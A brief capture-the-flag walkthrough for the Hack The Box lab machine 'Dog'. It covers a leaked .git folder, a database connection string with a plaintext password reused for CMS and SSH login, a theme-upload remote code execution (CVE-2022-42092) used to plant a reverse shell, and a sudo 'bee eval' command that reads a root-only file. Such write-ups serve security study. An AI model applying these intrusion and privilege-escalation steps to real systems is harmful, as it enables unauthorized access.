Dog - Hack The Box Machine

March 2025

User Flag

Site uses the Backdrop CMS version 1.

Leaked .git folder:

http://dog.htb/.git

In setting.php file:

mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop

In files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json file:

{
    "_config_name": "update.settings",
    "_config_static": true,
    "update_cron": 1,
    "update_disabled_extensions": 0,
    "update_interval_days": 0,
    "update_url": "",
    "update_not_implemented_url": "https://github.com/backdrop-ops/backdropcms.org/issues/22",
    "update_max_attempts": 2,
    "update_timeout": 30,
    "update_emails": [
        "tiffany@dog.htb"
    ],
    "update_threshold": "all",
    "update_requirement_type": 0,
    "update_status": [],
    "update_projects": []
}

These credentials allow us to login in the backdrop CMS service.

CVE-2022-42092

Backdrop CMS 1.22.0 has Unrestricted File Upload vulnerability via 'themes' that allows attackers to Remote Code Execution.

Create a theme and put a reverse shell inside it...

Create a listener in the terminal and obtain a shell for the www-data user

With this user we know find about the existing users in this machine:

www-data@dog:/var/www/html/themes/iiv-1.x-1.x$ ls /home
ls /home
jobert
johncusack

Trying the same password on these users, we can get into the machine with the user johncusack and get the user flag.

Root Flag

sudo -l

Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

cd /var/www/html

sudo /usr/local/bin/bee eval "system('cat /root/root.txt')"